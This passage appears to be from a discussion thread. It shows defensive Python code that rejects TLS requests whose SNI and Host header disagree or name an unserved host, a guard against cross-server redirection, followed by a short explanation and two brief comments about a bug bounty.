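def normalize_host(value: str) -> str:
    """Lower-case a host name and drop an optional :port suffix."""
    name = value.strip().lower()
    if name.startswith("["):
        # IPv6 literal; left untouched, it will not match a served name.
        return name
    if ":" in name:
        name = name.rsplit(":", 1)[0]
    return name.rstrip(".")


def select_virtual_host(sni: Optional[str],
                        host_header: Optional[str],
                        served_hosts=SERVED_HOSTS) -> Optional[str]:
    """Return the virtual host to serve, or None to reject the request.

    There is deliberately no fallback: a request naming a host this
    server does not serve is rejected instead of being handed to a
    default virtual host.
    """
    if not sni or not host_header:
        return None
    sni_name = normalize_host(sni)
    host_name = normalize_host(host_header)
    if sni_name != host_name:
        return None  # SNI and Host header disagree
    if host_name not in served_hosts:
        return None  # a name for some other server (e.g. the Attacked one)
    return host_name


print(select_virtual_host("hostb.example.com", "hostb.example.com:443"))
print(select_virtual_host("hosta.example.com", "hosta.example.com"))
```

With this rule, a request redirected from the Attacked server still carries that server's name in both SNI and Host, so it is rejected rather than answered by the TLS-brother's default virtual host.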

-

That means it's one of the biggest bug bounties ever awarded. Great.

-

No cards? Pretty weak...